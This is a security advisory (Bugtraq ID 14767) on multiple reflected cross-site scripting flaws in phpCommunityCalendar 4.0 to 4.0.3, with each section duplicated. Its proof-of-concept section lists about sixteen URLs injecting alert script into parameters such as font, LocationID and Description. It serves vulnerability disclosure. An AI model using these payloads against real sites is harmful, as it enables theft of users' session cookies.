PHPCommunityCalendar Multiple Remote Cross-Site Scripting Vulnerabilities
BID:14767
Info
PHPCommunityCalendar Multiple Remote Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 14767 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 07 2005 12:00AM |
| Updated: | Sep 07 2005 12:00AM |
| Credit: | rgod is credited with the discovery of this vulnerability. |
| Vulnerable: |
phpCommunityCalendar phpCommunityCalendar 4.0.3 phpCommunityCalendar phpCommunityCalendar 4.0.1 phpCommunityCalendar phpCommunityCalendar 4.0 |
| Not Vulnerable: | |
Discussion
PHPCommunityCalendar Multiple Remote Cross-Site Scripting Vulnerabilities
phpCommunityCalendar is prone to multiple remote cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
phpCommunityCalendar is prone to multiple remote cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
PHPCommunityCalendar Multiple Remote Cross-Site Scripting Vulnerabilities
No exploit is required.
Several examples have been provided:
http://www.example.com/[path]/thankyou.php?LocationID="><script>alert('LOL')</script>
http://www.example.com/[path]/calDaily.php?font="><script>alert('LOL')<script><"
http://www.example.com/[path]/calMonthly.php?font="><script>alert('LOL'</script><"
http://www.example.com/[path]/calMonthlyP.php?font="><script>alert('LOL')</script><"
http://www.example.com/[path]/calWeekly.php?font="><script>alert('LOL')</script><"
http://www.example.com/[path]/calWeeklyP.php?font="><script>alert('LOL')</script><"
http://www.example.com/[path]/calYearly.php?font="><script>alert('LOL')</script><"
http://www.example.com/[path]/calYearlyP.php?font="><script>alert('LOL')</script><"
http://www.example.com/[path]/day.php?font="><script>alert('LOL')</script><!--
http://www.example.com/[path]/day.php?LocationID="><script>alert('LOL')</script><!--
http://www.example.com/[path]/event.php?font="><script>alert('LOL')</script>
http://www.example.com/[path]/event.php?CeTi=</title><script>alert('LOL')</script>
http://www.example.com/[path]/event.php?Contact=<script>alert('LOL')</script>
http://www.example.com/[path]/event.php?Description=<script>alert('LOL')</script>
http://www.example.com/[path]/event.php?ShowAddress=<script>alert('LOL')</script>
http://www.example.com/[path]/week.php?font="><script>alert('LOL')</script>
No exploit is required.
Several examples have been provided:
http://www.example.com/[path]/thankyou.php?LocationID="><script>alert('LOL')</script>
http://www.example.com/[path]/calDaily.php?font="><script>alert('LOL')<script><"
http://www.example.com/[path]/calMonthly.php?font="><script>alert('LOL'</script><"
http://www.example.com/[path]/calMonthlyP.php?font="><script>alert('LOL')</script><"
http://www.example.com/[path]/calWeekly.php?font="><script>alert('LOL')</script><"
http://www.example.com/[path]/calWeeklyP.php?font="><script>alert('LOL')</script><"
http://www.example.com/[path]/calYearly.php?font="><script>alert('LOL')</script><"
http://www.example.com/[path]/calYearlyP.php?font="><script>alert('LOL')</script><"
http://www.example.com/[path]/day.php?font="><script>alert('LOL')</script><!--
http://www.example.com/[path]/day.php?LocationID="><script>alert('LOL')</script><!--
http://www.example.com/[path]/event.php?font="><script>alert('LOL')</script>
http://www.example.com/[path]/event.php?CeTi=</title><script>alert('LOL')</script>
http://www.example.com/[path]/event.php?Contact=<script>alert('LOL')</script>
http://www.example.com/[path]/event.php?Description=<script>alert('LOL')</script>
http://www.example.com/[path]/event.php?ShowAddress=<script>alert('LOL')</script>
http://www.example.com/[path]/week.php?font="><script>alert('LOL')</script>
Solution / Fix
PHPCommunityCalendar Multiple Remote Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHPCommunityCalendar Multiple Remote Cross-Site Scripting Vulnerabilities
References:
References:
- phpCommunityCalendar 4.0.3 Multiple Vulnerabilities (rgod)
- phpCommunityCalendar Web Site (phpCommunityCalendar)